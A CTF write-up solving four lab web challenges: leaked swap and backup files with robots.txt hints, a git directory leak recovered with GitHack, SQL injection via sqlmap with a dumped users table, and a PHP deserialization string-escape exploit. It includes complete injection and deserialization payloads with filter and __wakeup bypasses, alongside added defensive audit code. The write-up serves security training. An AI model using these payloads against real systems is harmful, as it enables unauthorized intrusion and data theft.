by:gyy

WEB - Common information gathering

Information gathering

Challenge link: http://10.147.19.176:7001/
Sensitive files. Hello, CTFer! Information gathering matters because it often turns up things you did not expect.

hack fun


tbh, true.

Information gathering
Part1
When in doubt, scan first. And it really found something:
/.index.php.swp
Knowledge link: a .swp file is a backup file left behind by vim (its swap file); whenever you force-quit vim, remember to delete the .swp file!

Open it and download the file.

It contains flag3, which means the flag is split into several parts.

Part2
The scan also turned up
/index.php~
Visiting it directly gives flag2:c192M3J5X2lt
Part3
Keep scanning to the end. It also found
/robots.txt
Take a look:
User-agent: *
Disallow:
/flag1_is_her3_fun.txt
Visiting that path gives flag1:aW5mb18x

Final

Combine the three parts to get the flag.
Summary
Just scan and you're done.

WEB - Careless Xiao Li

Git leak

Challenge link: http://10.147.19.176:7002/
Git test. Hello, CTFer! Many developers today use git for version control and automatic site deployment. If it is misconfigured, the .git folder may be deployed straight to production. This is the git leak vulnerability.

Xiao Li doesn't seem very careful: after a few iterations he put the whole folder straight into production :(

very easy


Git

Visiting ./.git redirects to ./.git/; per the challenge description, this is a git leak.
The trusty tool: GitHack
Command:
$ python2 GitHack.py -u "http://10.147.19.176:7002/.git"
This pulls down the .git directory.
Analysis
Check the history with:
$ git log --reflog
commit 213b7e386e9b0b406d91fae58bf8be11a58c3f88 (HEAD -> master)
Author: Veneno <593220746@qq.com>
Date:   Wed Dec 4 11:04:14 2019 +0800

flag


There is a commit named flag.
Restore it (note: run this one directory up, in the directory that contains .git):

$ git reset --hard 213b7e386e9b0b406d91fae58bf8be11a58c3f88
HEAD is now at 213b7e3 flag

This restores index.html.

Final

The flag is in index.html.

Solved: n1book{Z2l0X2xvb2tzX3MwX2Vhc3lmdW4}

Summary
GitHack is handy; there is also git extract.
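Both writeups above come down to leftovers sitting in the web root: an editor swap file, a `~` backup copy, a robots.txt that points at a hidden path, and a deployed `.git` directory. As an added example that is not part of the original writeup, here is a small pre-deploy audit in Python that walks a local web root and flags exactly those classes of leftovers before anything is published, plus a lenient robots.txt reader that also handles the wrapped `Disallow:` layout shown in Part3. The pattern list, the function names (`audit_webroot`, `robots_disallowed_paths`, `build_sample_webroot`) and the sample tree are my own assumptions; the file names in the sample tree are the ones the writeup found.

```python
import os
import re
import tempfile

# Filename patterns that betray editor/backup leftovers (constructed list for this example).
LEFTOVER_PATTERNS = [
    (re.compile(r"^\..*\.sw[a-p]$"), "vim swap file"),        # .index.php.swp, .index.php.swo, ...
    (re.compile(r".*~$"), "editor backup copy"),              # index.php~
    (re.compile(r".*\.(bak|old|orig)$"), "backup copy"),      # index.php.bak
]
LEFTOVER_DIRS = {".git": "git repository metadata", ".svn": "svn metadata"}


def audit_webroot(root):
    """Walk a web root and return sorted (relative_path, reason) pairs for every risky leftover."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in list(dirnames):
            if d in LEFTOVER_DIRS:
                findings.append((os.path.relpath(os.path.join(dirpath, d), root), LEFTOVER_DIRS[d]))
                dirnames.remove(d)  # flag the directory once; no need to descend into it
        for f in filenames:
            for pattern, reason in LEFTOVER_PATTERNS:
                if pattern.match(f):
                    findings.append((os.path.relpath(os.path.join(dirpath, f), root), reason))
                    break
    return sorted(findings)


def robots_disallowed_paths(robots_txt):
    """Return the paths a robots.txt asks crawlers to skip; each one is a hint worth reviewing.

    Handles both the standard 'Disallow: /path' form and the wrapped form from the writeup,
    where 'Disallow:' is followed by the path on the next line.
    """
    paths = []
    pending = False
    for line in robots_txt.splitlines():
        line = line.strip()
        if line.lower().startswith("disallow:"):
            value = line[len("disallow:"):].strip()
            if value:
                paths.append(value)
                pending = False
            else:
                pending = True
        elif pending and line.startswith("/"):
            paths.append(line)
            pending = False
        else:
            pending = False
    return paths


def build_sample_webroot():
    """Constructed sample tree mirroring the two writeups' findings (temporary directory)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".git", "objects"))
    for name in ("index.php", ".index.php.swp", "index.php~", "robots.txt"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("")
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    for path, reason in audit_webroot(sample):
        print("%-20s %s" % (path, reason))
    print(robots_disallowed_paths("User-agent: *\nDisallow:\n/flag1_is_her3_fun.txt\n"))
```

Run it against the real document root (or the build artifact) as a CI step and fail the deploy on any finding; the robots.txt reader is there because a `Disallow` line is public and will be read by anyone, so every path it names should be reviewed rather than hidden behind it.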

WEB - SQL injection - 1

SQL injection

Challenge link: http://10.147.19.176:7004/login.php

sqlmap is great

Nothing more to say about the SQL injection itself.
Just run sqlmap. Since it is a POST request, capture the request, save it to a file, replace the value of name with *, and run sqlmap:
$ python2 sqlmap.py -r 1.txt
Result:
sqlmap identified the following injection point(s) with a total of 1488 HTTP(s) requests:

Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=' AND (SELECT 7087 FROM(SELECT COUNT(*),CONCAT(0x71786b7171,(SELECT (ELT(7087=7087,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Uilw&pass=1

 [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
OK, dump everything with --dump:
Database: note
Table: users
[2 entries]
+----+----------------------------------+----------+
| id | passwd                           | username |
+----+----------------------------------+----------+
| 1  | 26f1c86def93bd19fb3ba6ad3d9f2a87 | test     |
| 2  | 26f1c86def93bd19fb3ba6ad3d9f2a87 | admin    |
+----+----------------------------------+----------+

Final

Payload = sqlmap.py -r 1.txt -D note -T fl4g --dump
Solved: n1book{bG9naW5fc3FsaV9pc19uaWNl}
Summary
Use sqlmap well; not many challenges can still be cracked with it...

Unserialize++

Deserialization string escape

guest.php: first fire the payload to reach admin; the string escape works.

payload = your[name.able=uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu&your[pass.able=AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}

In index.php:

file_put_contents("caches/".hash("sha256", $_SERVER['REMOTE_ADDR']), put(serialize($guest)));
function put($data){
    // 3 bytes -> 6 bytes: the lengths declared by serialize() no longer match the stored bytes
    $data = str_replace(chr(0)."*".chr(0), 'uuuuuu', $data);
    return $data;
}
Every 6 u's become 3 characters, so name's declared length runs over pass's characters and the closing quote; deserialization then reads the string we prepared, starting from the semicolon in
'your[pass.able=AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}'

Contents of the local ./caches/ file:

O:7:"someone":3:{s:12:"uuuuuuyour_name";s:60:"uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu";s:12:"uuuuuuyour_pass";s:53:"AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}";s:8:"uuuuuuadmin";i:0;}

Then get():

function get($data){
    // reverse of put(): 6 bytes -> 3 bytes, applied before unserialize()
    $data = str_replace('uuuuuu', chr(0)."*".chr(0), $data);
    return $data;
}

will read:

"O:7:\"someone\":3:{s:12:\"\\u0000*\\u0000your_name\";s:60:\"\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\\u0000*\\u0000\";s:12:\"\\u0000*\\u0000your_pass\";s:53:\"AA\";s:12:\"\\u0000*\\u0000your_pass\";s:2:\"AA\";s:5:\"admin\";i:1;}\";s:8:\"\\u0000*\\u0000admin\";i:0;}"

Ignoring the invisible characters, what it reads is:

 [your_name:protected] => **********";s:12:"*your_pass";s:53:"AA
 [your_pass:protected] => AA 
 [admin:protected] => 1

But this challenge has nothing to do with admin.

Construct:

O:6:"level1":1:{s:8:"username";O:6:"level2":1:{s:8:"username";O:6:"level3":1:{s:8:"username";s:5:"admin";}}}
payload = your[name.able=uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu&your[pass.able=A";s:12:"uuuuuuyour_pass";O:6:"level1":1:{s:8:"username";O:6:"level2":1:{s:8:"username";O:6:"level3":1:{s:8:"username";s:5:"admin";}}}
The check does not allow the string "username" to appear.

So, bypasses:
Use uppercase S as the string type
and write u as \75 (hex escape)


level2 has a __wakeup() method, so bypass it by declaring a wrong property count (2 instead of 1):
O:6:"level2":2
Take this challenge, for example:
O:7:"someone":3:{s:12:"uuuuuuyour_name";s:60:"uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu";s:12:"uuuuuuyour_pass";s:53:"AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}";s:8:"uuuuuuadmin";i:0;}
We have u x60, which get() turns into 30 characters, so the deserializer keeps reading 30 more characters:
s:60:"**********";s:12:"*your_pass";s:53:"AA    | (up to here)
Then the quote closes normally, so the next thing read is the string we constructed; the string escape succeeds:
";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}| (up to here)
The rest is useless, because } closes normally and deserialization ends:
";s:8:"uuuuuuadmin";i:0;}
That is the admin method; getting the flag works the same way.
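The length accounting above is the whole bug: put()/get() rewrite 3 bytes into 6 and back, but serialize() already fixed the byte counts, so any value containing the 6-byte token shifts the boundaries. As an added example that is not part of the original writeup, here is the mechanism ported to Python: the challenge's put()/get() pair, a minimal parser for PHP's serialize format (only s:, i: and O:; the S: hex form and __wakeup are deliberately not modelled), a round-trip check that a code reviewer can use to catch this class of storage transform, and a base64 replacement that never changes a declared length. The names `php_serialize_object`, `php_unserialize`, `is_roundtrip_safe`, `put_safe`, `get_safe`, `GUEST`, `stored_cache` and `loaded_object` are my own; the GUEST field values are the writeup's, and the parser reproduces the cache line shown above byte for byte.

```python
import base64

NUL_STAR = "\x00*\x00"  # prefix PHP's serialize() puts on protected property names
TOKEN = "uuuuuu"        # the challenge's 3-byte -> 6-byte substitution (from index.php)


def put(data):
    """Challenge's put(): applied before the cache file is written."""
    return data.replace(NUL_STAR, TOKEN)


def get(data):
    """Challenge's get(): applied after the cache file is read, before unserialize()."""
    return data.replace(TOKEN, NUL_STAR)


def php_serialize_object(classname, props):
    """Serialize a flat object whose properties are all protected (str or int), PHP style."""
    body = ""
    for name, value in props.items():
        key = NUL_STAR + name
        body += 's:%d:"%s";' % (len(key), key)
        body += ("i:%d;" % value) if isinstance(value, int) else ('s:%d:"%s";' % (len(value), value))
    return 'O:%d:"%s":%d:{%s}' % (len(classname), classname, len(props), body)


def php_unserialize(data):
    """Minimal PHP unserialize() for s:, i: and O: values; trailing bytes are ignored, as PHP does."""
    value, _ = _parse(data, 0)
    return value


def _parse(data, pos):
    kind = data[pos]
    if kind == "i":
        end = data.index(";", pos)
        return int(data[pos + 2:end]), end + 1
    if kind == "s":
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                      # skip ':"'
        value = data[start:start + length]     # consume exactly the declared length, whatever it covers
        if data[start + length:start + length + 2] != '";':
            raise ValueError("string terminator missing at offset %d" % (start + length))
        return value, start + length + 2
    if kind == "O":
        colon = data.index(":", pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len]
        p = colon + 2 + name_len + 2           # skip '":'
        colon2 = data.index(":", p)
        count = int(data[p:colon2])
        p = colon2 + 2                         # skip ':{'
        props = {}
        for _ in range(count):
            key, p = _parse(data, p)
            value, p = _parse(data, p)
            props[key.replace(NUL_STAR, "")] = value  # drop the visibility prefix, like var_dump's view
        if data[p] != "}":
            raise ValueError("object not closed at offset %d" % p)
        return (name, props), p + 1
    raise ValueError("unsupported type %r at offset %d" % (kind, pos))


def is_roundtrip_safe(serialized, put_fn=put, get_fn=get):
    """A storage transform is only safe for serialized data if it is exactly invertible on this input."""
    return get_fn(put_fn(serialized)) == serialized


def put_safe(data):
    """Hardened replacement: encode the bytes instead of rewriting them, so no length ever changes."""
    return base64.b64encode(data.encode("latin-1")).decode("ascii")


def get_safe(data):
    return base64.b64decode(data).decode("latin-1")


# Constructed guest object with the writeup's field values: 60 u's as the name and the
# serialized-looking fragment as the password; admin is 0 when the object is written.
GUEST = {
    "your_name": "u" * 60,
    "your_pass": 'AA";s:12:"uuuuuuyour_pass";s:2:"AA";s:5:"admin";i:1;}',
    "admin": 0,
}


def stored_cache():
    """What index.php writes to caches/<sha256 of REMOTE_ADDR> for GUEST."""
    return put(php_serialize_object("someone", GUEST))


def loaded_object(cache_text, get_fn=get):
    """What the reading side sees after get() and unserialize()."""
    return php_unserialize(get_fn(cache_text))


if __name__ == "__main__":
    plain = php_serialize_object("someone", GUEST)
    print("round-trip safe with put/get:", is_roundtrip_safe(plain))
    print("read back via get():", loaded_object(stored_cache()))
    print("read back via get_safe():", loaded_object(put_safe(plain), get_safe))
```

The review rule this encodes: never run a find-and-replace over serialize() output, because the byte counts inside it were fixed before the replacement ran. `is_roundtrip_safe` returns True for ordinary guests and False precisely for inputs that carry the token, which is the signal a reviewer wants; switching storage to `put_safe`/`get_safe` keeps the same object back with admin still 0.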

Final

payload =your[name.able=uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu&your[pass.able=A";s:12:"uuuuuuyour_pass";O:6:"level1":1:{S:8:"\75sername";O:6:"level2":2:{S:8:"\75sername";O:6:"level3":1:{S:8:"\75sername";s:5:"admin";}}}

Then visit ./guest.php to solve it.

Solved: s3c{NEJHdTBFaWJtekd5QFptRXZiTERTVW5rRTE4UDZrRio}

Summary:
For a string escape, count the characters carefully! (ugh)